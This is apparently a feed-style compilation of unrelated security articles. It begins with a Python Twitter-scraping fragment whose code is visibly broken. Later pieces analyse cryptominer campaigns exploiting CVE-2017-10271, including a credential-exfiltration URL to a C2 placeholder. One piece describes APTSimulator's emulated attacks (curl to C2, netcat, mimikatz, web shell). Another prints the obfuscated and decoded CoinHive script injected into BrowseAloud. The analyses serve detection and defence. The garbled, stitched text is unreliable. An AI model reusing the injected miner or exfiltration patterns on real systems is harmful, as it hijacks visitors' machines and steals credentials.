      if urls is not None:
        for url in urls:
          url_frequency_dist[url] += 1

      image_urls = get_image_urls(status)
      if image_urls is not None:
        for url in image_urls:
          if url not in all_image_urls:

# Iterate through image URLs, fetching each image if we haven't already
      print("Fetching images.")
      pictures_dir = os.path.join(save_dir, "images")
      if not os.path.exists(pictures_dir):
        print("Creating directory: " + pictures_dir)
      for url in all_image_urls:
        m ="^http:\/\/pbs\.twimg\.com\/media\/(.+)$", url)
        if m is not None:
          filename =
          print("Getting picture from: " + url)
          save_path = os.path.join(pictures_dir, filename)
          if not os.path.exists(save_path):
            response = requests.get(url, stream=True)
            with open(save_path, 'wb') as out_file:
              shutil.copyfileobj(response.raw, out_file)
            del response

# Output a bunch of files containing the data we just gathered
      print("Saving data.")
      json_outputs = {"tweets.json": tweets,
                      "urls.json": url_frequency_dist,
                      "hashtags.json": hashtag_frequency_dist,
                      "influencers.json": influencer_frequency_dist,
                      "mentioned.json": mentioned_frequency_dist,
                      "user_user_graph.json": user_user_graph,
                      "user_hashtag_graph.json": user_hashtag_graph,
                      "hashtag_hashtag_graph.json": hashtag_hashtag_graph}
      for name, dataset in json_outputs.iteritems():
        filename = os.path.join(save_dir, name)
        save_json(dataset, filename)

# These files are created in a format that can be easily imported into Gephi
      csv_outputs = {"user_user_graph.csv": user_user_graph,
                     "user_hashtag_graph.csv": user_hashtag_graph,
                     "hashtag_hashtag_graph.csv": hashtag_hashtag_graph}
      for name, dataset in csv_outputs.iteritems():
        filename = os.path.join(save_dir, name)
        save_csv(dataset, filename)

      text_outputs = {"hashtags.txt": hashtag_frequency_dist,
                      "influencers.txt": influencer_frequency_dist,
                      "mentioned.txt": mentioned_frequency_dist,
                      "urls.txt": url_frequency_dist}
      for name, dataset in text_outputs.iteritems():
        filename = os.path.join(save_dir, name)
        save_text(dataset, filename)

Running this tool will create a directory for each search term provided at the command-line. To search for a sentence, or to include multiple terms, enclose the argument with quotes. Due to Twitter’s rate limiting, your search may hit a limit, and need to pause to wait for the rate limit to reset. Luckily twarc takes care of that. Once the search is finished, a bunch of files will be written to the previously created directory.

Since I use a Mac, I can use its Quick Look functionality from the Finder to browse the output files created. Since pytorch is gaining a lot of interest, I ran my script against that search term. Here’s some examples of how I can quickly view the output files.

The preview pane is enough to get an overview of the recorded data.


Pressing spacebar opens the file in Quick Look, which is useful for data that doesn’t fit neatly into the preview pane

Importing the user_user_graph.csv file into Gephi provided me with some neat visualizations about the pytorch community.

A full zoom out of the pytorch community

Here we can see who the main influencers are. It seems that Yann LeCun and François Chollet are Tweeting about pytorch, too.

Here’s a zoomed-in view of part of the network.

Zoomed in view of part of the Gephi graph generated.

If you enjoyed this post, check out the previous two articles I published on using the Twitter API here and here. I hope you have fun tailoring this script to your own needs!

They Stole My Shoes – Paul’s Security Weekly #548

This week, Steve Tcherchian, CISO and Director of Product Management of XYPRO Technology joins us for an interview! In our second feature interview, Paul speaks with Michael Bazzell, OSINT & Privacy Consultant! In the news, we have updates from Google, Bitcoin, NSA, Microsoft, and more on this episode of Paul's Security Weekly!

Full Show Notes:


Visit for all the latest episodes!

CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining


FireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.

CVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a Critical Patch Update that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.

FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.

We saw evidence of organizations located in various countries – including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical – being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of these attacks is indiscriminate in nature.

The recent cryptocurrency boom has resulted in a growing number of operations – employing diverse tactics – aimed at stealing cryptocurrencies. The idea that these cryptocurrency mining operations are less risky, along with the potentially nice profits, could lead cyber criminals to begin shifting away from ransomware campaigns.

Tactic #1: Delivering the miner directly to a vulnerable server

Some tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim’s system (Figure 1), and executing it using ShellExecute().

Figure 1: Downloading the payload directly

Tactic #2: Utilizing PowerShell scripts to deliver the miner

Other tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).

Figure 2: Exploit delivering PowerShell script

This script has the following functionalities:

  • Downloading miners from remote servers

Figure 3: Downloading cryptominers

As shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.

  • Creating scheduled tasks for persistence

Figure 4: Creation of scheduled task

  • Deleting scheduled tasks of other known cryptominers

Figure 5: Deletion of scheduled tasks related to other miners

In Figure 4, the cryptominer creates a scheduled task with name “Update service for Oracle products1”.  In Figure 5, a different variant deletes this task and other similar tasks after creating its own, “Update service for Oracle productsa”.  

From this, it’s quite clear that different attackers are fighting over the resources available in the system.

  • Killing processes matching certain strings associated with other cryptominers

Figure 6: Terminating processes directly

Figure 7: Terminating processes matching certain strings

Similar to scheduled tasks deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).

  • Connects to mining pools with wallet key

Figure 8: Connection to mining pools

The miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.

  • Limiting CPU usage to avoid suspicion

Figure 9: Limiting CPU Usage

To avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).

Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue

Some tactics involve spreading laterally across a victim’s environment using dumped Windows credentials and the EternalBlue vulnerability (CVE-2017-0144).

The malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of established non-loopback network connections. Every IP address is then tested with extracted credentials and a credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 server on the target machine. This variant maintains persistence via WMI (Windows Management Instrumentation).

The malware also has the capability to perform a Pass-the-Hash attack with the NTLM information derived from Mimikatz in order to download and execute the malware in remote systems.

Additionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 'http://<C2>:8000/api.php?data=<credential data>'.

If the lateral movement with credentials fails, then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue, and uses it to spread to that host.

After all network derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host.

Tactic #4: Scenarios observed in Linux OS

We’ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.

Figure 10: Delivery of shell scripts

The shell script performs the following activities:

  • Attempts to kill already running cryptominers

Figure 11: Terminating processes matching certain strings

  • Downloads and executes cryptominer malware

Figure 12: Downloading CryptoMiner

  • Creates a cron job to maintain persistence

Figure 13: Cron job for persistence

  • Tries to kill other potential miners to hog the CPU usage

Figure 14: Terminating other potential miners

The function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. This terminates other potential miners and maximizes the utilization of resources.


Use of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make money from victims. We’ve observed one threat actor mining around 1 XMR/day, demonstrating the potential profitability and reason behind the recent rise in such attacks. Additionally, these operations may be perceived as less risky when compared to ransomware operations, since victims may not even know the activity is occurring beyond the slowdown in system performance.

Notably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner so cyber criminals will maximize their outreach and profits.

FireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.

At the time of writing, FireEye HX detects this activity with the following indicators:

Detection Name




Indicators of Compromise





















Thanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.

Happy Valentine’s Day – Enterprise Security Weekly #80

This week, Paul and John are accompanied by Guy Franco, Security Consultant for Javelin Networks, who will deliver a Technical Segment on Domain Persistence! In the news, we have updates from ServerSide, Palo Alto, NopSec, Microsoft, and more on this episode of Enterprise Security Weekly!  


Full Show Notes:


Visit for all the latest episodes!

On the Anniversary of the Islamic Revolution, 30 Iranian News sites hacked to show death of Ayatollah Khamenei

February 11th marked the 39th aniversary of the Islamic Revolution in Iran, the day when the Shah was overthrown and the government replaced by the Ayatollah Khomeini, called "The Supreme Leader" of Iran.  February 10th marked something quite different -- the day when hackers gained administrative control of more than 30 Iranian news websites and used stolen credentials to login to their Content Management Systems (CMS) and share a fake news article -- the death of Ayatollah Khamenei.

The Iranian Ministry of Communications and Information Technology shared the results of their investigation via the Iranian CERT ( which has announced the details of the hack in this PDF report.  All of the websites in question, which most famously included, were hosted on the same platform, a Microsoft IIS webserver running

Most of the thirty hacked websites were insignificant as far as global traffic is concerned.  But several are quite popular.  We evaluated each site listed by by looking up its Alexa ranking.  Alexa tracks the popularity of all websites on the Internet.  Three of the sites are among the 100,000 most popular websites on the Internet.

NewsSiteAlexa Ranking

These rankings would put the online leadership for the top news sites listed as similar to a mid-sized American newspaper.  For example, the Fort Worth Star-Telegram ranks 31,375, while the Springfield, Illinois State Journal-Register is 84,882.  (For more examples, the Boston Globe is 4,656, while the New York Times is #111.)

Hacked Sites not listed by Alexa among the top ten million sites on the Internet included:,,,,,,,,,,'s report notes that the primary explanation of the attack is that all of the attacked news sites have "the default user name and password of the backup company" and a "high-level" email account with the same username and password had permissions to all sites.

Although the official Islamic Republic News Agency says the source of the attack was "the United Kingdom and the United States", that accusation is not entirely clear after reviewing the report from the CERT.  The IP address is listed by the Iranian CERT as being a UK based company using AS47453.  Several sources, including Iranian site, point out that this is actually a Bulgarian IP address.  AS47453 belongs to "" with support details listed in Pleven, Bulgaria. - mislabeled in the original report
This error of IP address does seem to have been human error, rather than deception, and the CERT has released an updated version of the Iranian news site hacking report which can be found here, showing the corrected information.

The Corrected version of the report ... (created Feb 12 0408AM)

The CERT report is rather uncomplimentary of the hackers, mentioning that there seem to be several clumsy failed reports to dump a list of userids and passwords from the Content Management System database via SQL Injection attacks, as well as several other automated attacks.  In the end, however, the measure of a hacker is in many ways SUCCESS, and it does seem that the objective, shaming the Ayatollah by declaring his death on the eve of the Islamic Revolution holiday, was achieved.

While a source IP address cannot serve exclusively to provide attack attribution, Newsweek reports that on the day the attack began (Thursday, February 8, 2018), that Ayatollah Ali Khamenei gave a speech to commanders of the Iranian Air Force in which he claimed that the United States had created the Islamic State militant group and that the USA is responsible for all the death and destruction ISIS has caused.  That could certainly serve as a motive for certain actors, although the holiday itself, called by American politicians "Death to America Day" included as usual occasional American, Israeli, and British flags burning, as well as several instances of Donald Trump efigees being burned, overall the protests seemed more timid than in the past.


IDG Contributor Network: How to ensure that giving notice doesn’t mean losing data

Most IT teams invest resources to ensure data security when onboarding new employees. You probably have a checklist that covers network access and permissions, access to data repositories, security policy acknowledgement, and maybe even security awareness education. But how robust is your offboarding security checklist? If you’re just collecting a badge and disabling network and email access on the employee’s last day, you’re not doing enough to protect your data.

Glassdoor reported recently that 35% of hiring decision makers expect more employees to quit in 2018 compared to last year. Whether through malicious intent or negligence, when insiders leave, there’s a risk of data leaving with them. To ensure data security, you need to develop and implement a robust offboarding process.

To read this article in full, please click here

This Is An Emergency – Business Security Weekly #73

This week, Michael and Paul interview Dawn-Marie Hutchinson, Executive Director of Optiv Offline! In the Article Discussion, security concern pushing IT to channel services, what drives sales growth and repeat business, and in the news, we have updates from Proofpoint, J2 Global, LogMeIn, and more on this episode of Business Security Weekly!

Full Show Notes:


Visit for all the latest episodes!

Jim Carrey Hacked My Facebook – Application Security Weekly #05

This week, Keith and Paul continue to discuss OWASP Application Security Verification Standard! In the news, Cisco investigation reveals ASA vulnerability is worse than originally thought, Google Chrome HTTPS certificate apocalypse, Intel made smart glasses that look normal, and more on this episode of Application Security Weekly!


Full Show Notes:


Visit for all the latest episodes!

IDG Contributor Network: 7 ways to stay safe online on Valentine’s Day

Valentine’s Day brings out the softer side in all of us and often plays on our quest for love and appreciation. Online scammers know that consumers are more open to accepting cards, gifts and invitations all in the name of the holiday. While our guards are down, here are a few tips for safeguarding yourself while on your quest to find love on the Internet.

1. Darker side of dating websites

Unfortunately, dating websites — and modern dating apps — are a hunting ground for hackers. There is a peak of online dating activity between New Year’s and Valentine’s Day and cybercriminals are ready to take advantage of the the increased action on popular dating websites like Tinder, OKCupid, Plenty of Fish, and many others. Rogue adverts and rogue profiles are two of the biggest offenders. For example, many are skeptical of unsolicited advertisements via email. Therefore, spammers have moved to popular websites, including dating and adult sites, to post rogue ads and links. In August 2015, Malwarebytes detected malvertising attacks on PlentyOfFish, which draws more than three million daily users. Just a few months later, the U.K. version of online dating website was also caught serving up malvertising.

To read this article in full, please click here

toolsmith #131 – The HELK vs APTSimulator – Part 1

Ladies and gentlemen, for our main attraction, I give you...The HELK vs APTSimulator, in a Death Battle! The late, great Randy "Macho Man" Savage said many things in his day, in his own special way, but "Expect the unexpected in the kingdom of madness!" could be our toolsmith theme this month and next. Man, am I having a flashback to my college days, many moons ago. :-) The HELK just brought it on. Yes, I know, HELK is the Hunting ELK stack, got it, but it reminded me of the Hulk, and then, I thought of a Hulkamania showdown with APTSimulator, and Randy Savage's classic, raspy voice popped in my head with "Hulkamania is like a single grain of sand in the Sahara desert that is Macho Madness." And that, dear reader, is a glimpse into exactly three seconds or less in the mind of your scribe, a strange place to be certain. But alas, that's how we came up with this fabulous showcase.
In this corner, from Roberto Rodriguez, @Cyb3rWard0g, the specter in SpecterOps, it's...The...HELK! This, my friends, is the s**t, worth every ounce of hype we can muster.
And in the other corner, from Florian Roth, @cyb3rops, the The Fracas of Frankfurt, we have APTSimulator. All your worst adversary apparitions in one APT mic drop. Battle!

Now with that out of our system, let's begin. There's a lot of goodness here, so I'm definitely going to do this in two parts so as not undervalue these two offerings.
HELK is incredibly easy to install. Its also well documented, with lots of related reading material, let me propose that you take the tine to to review it all. Pay particular attention to the wiki, gain comfort with the architecture, then review installation steps.
On an Ubuntu 16.04 LTS system I ran:
  • git clone
  • cd HELK/
  • sudo ./ 
Of the three installation options I was presented with, pulling the latest HELK Docker Image from cyb3rward0g dockerhub, building the HELK image from a local Dockerfile, or installing the HELK from a local bash script, I chose the first and went with the latest Docker image. The installation script does a fantastic job of fulfilling dependencies for you, if you haven't installed Docker, the HELK install script does it for you. You can observe the entire install process in Figure 1.
Figure 1: HELK Installation
You can immediately confirm your clean installation by navigating to your HELK KIBANA URL, in my case
For my test Windows system I created a Windows 7 x86 virtual machine with Virtualbox. The key to success here is ensuring that you install Winlogbeat on the Windows systems from which you'd like to ship logs to HELK. More important, is ensuring that you run Winlogbeat with the right winlogbeat.yml file. You'll want to modify and copy this to your target systems. The critical modification is line 123, under Kafka output, where you need to add the IP address for your HELK server in three spots. My modification appeared as hosts: ["","",""]. As noted in the HELK architecture diagram, HELK consumes Winlogbeat event logs via Kafka.
On your Windows systems, with a properly modified winlogbeat.yml, you'll run:
  • ./winlogbeat -c winlogbeat.yml -e
  • ./winlogbeat setup -e
You'll definitely want to set up Sysmon on your target hosts as well. I prefer to do so with the @SwiftOnSecurity configuration file. If you're doing so with your initial setup, use sysmon.exe -accepteula -i sysmonconfig-export.xml. If you're modifying an existing configuration, use sysmon.exe -c sysmonconfig-export.xml.  This will ensure rich data returns from Sysmon, when using adversary emulation services from APTsimulator, as we will, or experiencing the real deal.
With all set up and working you should see results in your Kibana dashboard as seen in Figure 2.

Figure 2: Initial HELK Kibana Sysmon dashboard.
Now for the showdown. :-) Florian's APTSimulator does some comprehensive emulation to make your systems appear compromised under the following scenarios:
  • POCs: Endpoint detection agents / compromise assessment tools
  • Test your security monitoring's detection capabilities
  • Test your SOCs response on a threat that isn't EICAR or a port scan
  • Prepare an environment for digital forensics classes 
This is a truly admirable effort, one I advocate for most heartily as a blue team leader. With particular attention to testing your security monitoring's detection capabilities, if you don't do so regularly and comprehensively, you are, quite simply, incomplete in your practice. If you haven't tested and validated, don't consider it detection, it's just a rule with a prayer. APTSimulator can be observed conducting the likes of:
  1. Creating typical attacker working directory C:\TMP...
  2. Activating guest user account
    1. Adding the guest user to the local administrators group
  3. Placing a svchost.exe (which is actually srvany.exe) into C:\Users\Public
  4. Modifying the hosts file
    1. Adding mapping to private IP address
  5. Using curl to access well-known C2 addresses
    1. C2:
  6. Dropping a Powershell netcat alternative into the APT dir
  7. Executes nbtscan on the local network
  8. Dropping a modified PsExec into the APT dir
  9. Registering mimikatz in At job
  10. Registering a malicious RUN key
  11. Registering mimikatz in scheduled task
  12. Registering cmd.exe as debugger for sethc.exe
  13. Dropping web shell in new WWW directory
A couple of notes here.
Download and install APTSimulator from the Releases section of its GitHub pages.
APTSimulator includes curl.exe, 7z.exe, and 7z.dll in its helpers directory. Be sure that you drop the correct version of 7 Zip for your system architecture. I'm assuming the default bits are 64bit, I was testing on a 32bit VM.

Let's do a fast run-through with HELK's Kibana Discover option looking for the above mentioned APTSimulator activities. Starting with a search for TMP in the sysmon-* index yields immediate results and strikes #1, 6, 7, and 8 from our APTSimulator list above, see for yourself in Figure 3.

Figure 3: TMP, PS nc, nbtscan, and PsExec in one shot
Created TMP, dropped a PowerShell netcat, nbtscanned the local network, and dropped a modified PsExec, check, check, check, and check.
How about enabling the guest user account and adding it to the local administrator's group? Figure 4 confirms.

Figure 4: Guest enabled and escalated
Strike #2 from the list. Something tells me we'll immediately find svchost.exe in C:\Users\Public. Aye, Figure 5 makes it so.

Figure 5: I've got your svchost right here
Knock #3 off the to-do, including the process.commandline,, and file.creationtime references. Up next, the At job and scheduled task creation. Indeed, see Figure 6.

Figure 6. tasks OR schtasks
I think you get the point, there weren't any misses here. There are, of course, visualization options. Don't forget about Kibana's Timelion feature. Forensicators and incident responders live and die by timelines, use it to your advantage (Figure 7).

Figure 7: Timelion
Finally, for this month, under HELK's Kibana Visualize menu, you'll note 34 visualizations. By default, these are pretty basic, but you quickly add value with sub-buckets. As an example, I selected the Sysmon_UserName visualization. Initially, it yielded a donut graph inclusive of malman (my pwned user), SYSTEM and LOCAL SERVICE. Not good enough to be particularly useful I added a sub-bucket to include process names associated with each user. The resulting graph is more detailed and tells us that of the 242 events in the last four hours associated with the malman user, 32 of those were specific to cmd.exe processes, or 18.6% (Figure 8).

Figure 8: Powerful visualization capabilities
This has been such a pleasure this month, I am thrilled with both HELK and APTSimulator. The true principles of blue team and detection quality are innate in these projects. The fact that Roberto consider HELK still in alpha state leads me to believe there is so much more to come. Be sure to dig deeply into APTSimulator's Advance Solutions as well, there's more than one way to emulate an adversary.
Next month Part 2 will explore the Network side of the equation via the Network Dashboard and related visualizations, as well as HELK integration with Spark, Graphframes & Jupyter notebooks.
Aw snap, more goodness to come, I can't wait.
Cheers...until next time.

Weekly Cyber Risk Roundup: Cryptocurrency Attacks and a Major Cybercriminal Indictment

Cryptocurrency continued to make headlines this past week for a variety of cybercrime-related activities.

2018-02-10_ITT.pngFor starters, researchers discovered a new cryptocurrency miner, dubbed ADB.Miner, that infected nearly 7,000 Android devices such as smartphones, televisions, and tablets over a several-day period. The researchers said the malware uses the ADB debug interface on port 5555 to spread and that it has Mirai code within its scanning module.

In addition, several organizations reported malware infections involving cryptocurrency miners. Four servers at a wastewater facility in Europe were infected with malware designed to mine Monero, and the incident is the first ever documented mining attack to hit an operational technology network of a critical infrastructure operator, security firm Radiflow said. In addition, Decatur County General Hospital recently reported that cryptocurrency mining malware was found on a server related to its electronic medical record system.

Reuters also reported this week on allegations by South Korea that North Korea had hacked into unnamed cryptocurrency exchanges and stolen billions of won. Investors of the Bee Token ICO were also duped after scammers sent out phishing messages to the token’s mailing list claiming that a surprise partnership with Microsoft had been formed and that those who contributed to the ICO in the next six hours would receive a 100% bonus.

All of the recent cryptocurrency-related cybercrime headlines have led some experts to speculate that the use of mining software on unsuspecting users’ machines, or cryptojacking, may eventually surpass ransomware as the primary money maker for cybercriminals.


Other trending cybercrime events from the week include:

  • W-2 data compromised: The City of Pittsburg said that some employees had their W-2 information compromised due to a phishing attack. The University of Northern Colorado said that 12 employees had their information compromised due to unauthorized access to their profiles on the university’s online portal, Ursa, which led to the theft of W-2 information. Washington school districts are warning that an ongoing phishing campaign is targeting human resources and payroll staff in an attempt to compromise W-2 information.
  • U.S. defense secrets targeted: The Russian hacking group known as Fancy Bear successfully gained access to the email accounts of contract workers related to sensitive U.S. defense technology; however, it is uncertain what may have been stolen. The Associated Press reported that the group targeted at least 87 people working on militarized drones, missiles, rockets, stealth fighter jets, cloud-computing platforms, or other sensitive activities, and as many as 40 percent of those targeted ultimately clicked on the hackers’ phishing links.
  • Financial information stolen: Advance-Online is notifying customers that their personal and financial information stored on the company’s online platform may have been subject to unauthorized access from April 29, 2017 to January 12, 2018. Citizens Financials Group is notifying customers that their financial information may have been compromised due to the discovery of a skimming device found at a Citizens Bank ATM in Connecticut. Ameriprise Financial is notifying customers that one of its former employees has been calling its service center and impersonating them by using their name, address, and account numbers.
  • Other notable events:  Swisscom said that the “misappropriation of a sales partner’s access rights” led to a 2017 data breach that affected approximately 800,000 customers. A cloud repository belonging to the Paris-based brand marketing company Octoly was erroneously configured for public access and exposed the personal information of more than 12,000 Instagram, Twitter, and YouTube personalities. Ron’s Pharmacy in Oregon is notifying customers that their personal information may have been compromised due to unauthorized access to an employee’s email account. Partners Healthcare said that a May 2017 data breach may have exposed the personal information of up to 2,600 patients. Harvey County in Kansas said that a cyber-attack disrupted county services and led to a portion of the network being disabled. Smith Dental in Tennessee said that a ransomware infection may have compromised the personal information of 1,500 patients. Fresenius Medical Care North America has agreed to a $3.5 million settlement to settle potential HIPAA violations stemming from five separate breaches that occurred in 2012.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of those “newly seen” targets, meaning they either appeared in SurfWatch Labs’ data for the first time or else reappeared after being absent for several weeks, are shown in the chart below.


Cyber Risk Trends From the Past Week

2018-02-10_RiskScoresA federal indictment charging 36 individuals for their role in a cybercriminal enterprise known as the Infraud Organization, which was responsible for more than $530 million in losses, was unsealed this past week. Acting Assistant Attorney General Cronan said the case is “one of the largest cyberfraud enterprise prosecutions ever undertaken by the Department of Justice.”

The indictment alleges that the group engaged in the large-scale acquisition, sale, and dissemination of stolen identities, compromised debit and credit cards, personally identifiable information, financial and banking information, computer malware, and other contraband dating back to October 2010. Thirteen of those charged were taken into custody in countries around the world.

As the Justice Department press release noted:

Under the slogan, “In Fraud We Trust,” the organization directed traffic and potential purchasers to the automated vending sites of its members, which served as online conduits to traffic in stolen means of identification, stolen financial and banking information, malware, and other illicit goods.  It also provided an escrow service to facilitate illicit digital currency transactions among its members and employed screening protocols that purported to ensure only high quality vendors of stolen cards, personally identifiable information, and other contraband were permitted to advertise to members.

ABC News reported that investigators believe the group’s nearly 11,000 members targeted more than 4.3 million credit cards, debit cards, and bank accounts worldwide. Over its seven-year history, the group inflicted $2.2 billion in intended losses and more than $530 million in actual losses against a wide range of financial institutions, merchants, and individuals.


Trust Me, I am a Screen Reader, not a CryptoMiner

Until late Sunday afternoon, a number of public sector websites including ICO, NHS, and local councils (for example, Camden in London) have been serving a crypto miner unbeknownst to visitors, turning them into a free computing cloud at the service of unknown hackers. Although initially only UK sites were particularly affected, subsequent reports included Ireland and US websites as well.


Figure 1: BrowseAloud accessibility tool.

While initially researchers considered the possibility of a new vulnerability exploited at large, Scott Helme ( quickly identified the culprit in a foreign JavaScript fragment added to the BrowseAloud (see Figure 1) JavaScript file (https://wwwbrowsealoud[.]com/plus/scripts/ba.js), an accessibility tool used by all the affected websites:

\x69\x66 \x28\x6e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x68\x61\x72\x64\x77\x61\x72\x65\x43\x6f\x6e\x63\x75\x72\x72
\x65\x6e\x63\x79 \x3e \x31\x29\x7b \x76\x61\x72 \x63\x70\x75\x43\x6f\x6e\x66\x69\x67 \x3d 
\x30\x2e\x36\x7d\x7d \x65\x6c\x73\x65 \x7b \x76\x61\x72 \x63\x70\x75\x43\x6f\x6e\x66\x69\x67 \x3d 
\x7b\x74\x68\x72\x65\x61\x64\x73\x3a \x38\x2c\x74\x68\x72\x6f\x74\x74\x6c\x65\x3a\x30\x2e\x36\x7d\x7d 
\x76\x61\x72 \x6d\x69\x6e\x65\x72 \x3d \x6e\x65\x77 

Compromising a third-party tool JavaScript is no small feat, and it allowed deployment of the code fragment on thousands of unaware websites (here a comprehensive list of websites using BrowseAloud to provide screen reader support and text translation services:

To analyze the obfuscated code we loaded one of the affected websites (Camden Council) into our instrumented web browser (Figure 2) and extracted the clear text.

Figure 2: the web site Camden Council as analyzed by Lastline instrumented web browser.

As it turns out, it is an instance of the well-known and infamous CoinHive, mining the Monero cryptocurrency:

<script> if (navigator.hardwareConcurrency > 1){ var cpuConfig = {threads: 
Math.round(navigator.hardwareConcurrency/3),throttle:0.6}} else { var cpuConfig = 
{threads: 8,throttle:0.6}} var miner = new 

Unlike Bitcoin wallet addresses, CoinHive site keys do not allow balance checks, making impossible to answer the question of how much money the attackers managed to make in this heist. On the other hand, quite interestingly, the very same CoinHive key did pop up on Twitter approximately one week ago (; context on this is still not clear, and we will update the blog post as we know more.

As of now (16:34) the company behind BrowseAloud, Texthelp, removed the JavaScript from their servers (as a preventive measure the browsealoud[.]com domain has also been set to resolve to NXDOMAIN) effectively putting a stop to this emergency by disabling the BrowseAloud tool altogether. But when did it start, and most importantly how did it happen?

Figure 3: S3 object metadata.

Marco Cova one of our senior researchers here at Lastline, quickly noticed that the BrowseAloud JavaScript files were hosted on an S3 bucket (see Figure 3 above).

In particular the last modified time of the ba.js resource showed 2018-02-11T11:14:24 making this Sunday morning UK time the very first moment this specific version of the JavaScript had been served.

Figure 4: S3 object permissions.

Although it’s not possible to know for certain (only our colleagues at Texthelp can perform this investigation) it seems possible that attackers may have managed to modify the object referencing the JavaScript file by taking advantage of weak S3 permissions (see Figure 4). Unfortunately we cannot pinpoint the exact cause as we do not have at our disposal all permissions records for the referenced S3 bucket.

Considering the number of components involved in a website on average, it might be concerning to see that a single compromise managed to affect so many websites. As Scott Helme noticed however, we should be aware that technologies able to thwart this kind of attacks exist already: in particular, if those websites had implemented CSP (Content Security Policy) to mandate the use of SRI (Subresource Integrity), any attempt to load a compromised JavaScript would have failed, sparing thousands of users the irony of mining cryptocurrency for unknown hackers, while looking to pay their council tax.

The post Trust Me, I am a Screen Reader, not a CryptoMiner appeared first on Lastline.

Tips to improve IoT security on your network

Judging by all the media attention that The Internet of Things (or IoT) gets these days, you would think that the world was firmly in the grip of a physical and digital transformation. The truth, though, is that we all are still in the early days of the IoT.

The analyst firm Gartner, for example, puts the number of Internet connected “things” at just 8.4 billion in 2017 – counting both consumer and business applications. That’s a big number, yes, but much smaller number than the “50 billion devices” or “hundreds of billions of devices” figures that get bandied about in the press.

To read this article in full, please click here

(Insider Story)

Walk The Plank – Paul’s Security Weekly #547

This week, Zane Lackey of Signal Sciences joins us for an interview! Our very own Larry Pesce delivers the Technical Segment on an intro to the ESP8266 SoC! In the news, we have updates from Bitcoin, NSA, Facebook, and more on this episode of Paul's Security Weekly!

Full Show Notes:


Visit for all the latest episodes!

Dark Side Ops I & 2 Review

Dark Side Ops I 

 A really good overview of the class is here

I enjoyed the class. This was actually my second time taking the class and it wasn't nearly as overwhelming the 2nd time :-)

 I’ll try not to cover what is in Raphael’s article as it is still applicable and I am assuming you read it before continuing on.

I really enjoyed the VisualStudio time and building Slingshot and Throwback myself along with getting a taste for extending the  implant by adding the keylogger, mimikatz, and hashdump modules.

Windows API developers may be able to greatly extend slingshot but I don't think I have enough WinAPI kung fu to do it and there wasn’t enough setup around the “how” to consistently do it either unless you have a strong windows API background. However, one of the labs consisted of adding load and run powershell functionality which allows you to make use of the plethora of powershell code out there.

There was also a great lab where we learned how to pivot through a compromised SOHO router and the technique could also be extended for VPS or cloud providers.

Cons of the class.

The visual studio piece can get overwhelming but it definitely gives you a big taste of (Windows) implant development.  The class material are getting slightly dated in some cases.  A refresh might be helpful.  More Throwback usage & development would be fun (even as optional labs).


Lab one was getting a fresh copy of slingshot back up and running and then setting up some additional code to do a powershell web cradle to get our slingshot implant up and running on a remote host. Similar to how metasploit web delivery does things.

Lab 2 was doing some devops to set up servers, OpenVPN to tunnel traffic, and adding HTTPS to our slingshot codebase.

Lab 3 was some Initial activity labs (HTA and chrome plugin exploitation)

Lab 4 was tweaking our HTA to defeat some common detections and protections. We also worked on code to do sandbox evasions as it’s becoming more common for automated sandbox solutions to be tied to mail gateways or  just for people doing response.

Lab 5 whitelist bypassing

Lab 6 was doing some profiling via powershell and using slingshot to be able to do checks on the host

Labs 7-9 building a kernel rootkit

Lab 10 persistence via COM Hijacking and hiding our custom DLL in the registry and Lab 11 was privilege escalation via custom service.

Final Thoughts

I enjoyed the four days and felt like I learned a lot. So the TLDR is that I recommend taking the class(es).

I think the set of courses are having a bit of an identity crisis mostly due to the 2 day
format and would be a much better class as a 5 day.  It is heavy development focused meaning you
spend a lot of time in Visual Studio tweaking C code. The “operations” piece  of the course definitely
suffers a bit due to all the dev time. There was minimal talk around lateral movement and the whole
thing is entirely Windows focused so no Linux and no OSX.  A suggestion to fix the “ops” piece
would be to have a Dark Side Ops - Dev and Dark Side Ops - Operator courses where the dev one
is solely deving your implant and the Operator course would be solely using the implant you dev’d
(or was provided to you).  The Silent Break team definitely knows their stuff and a longer class
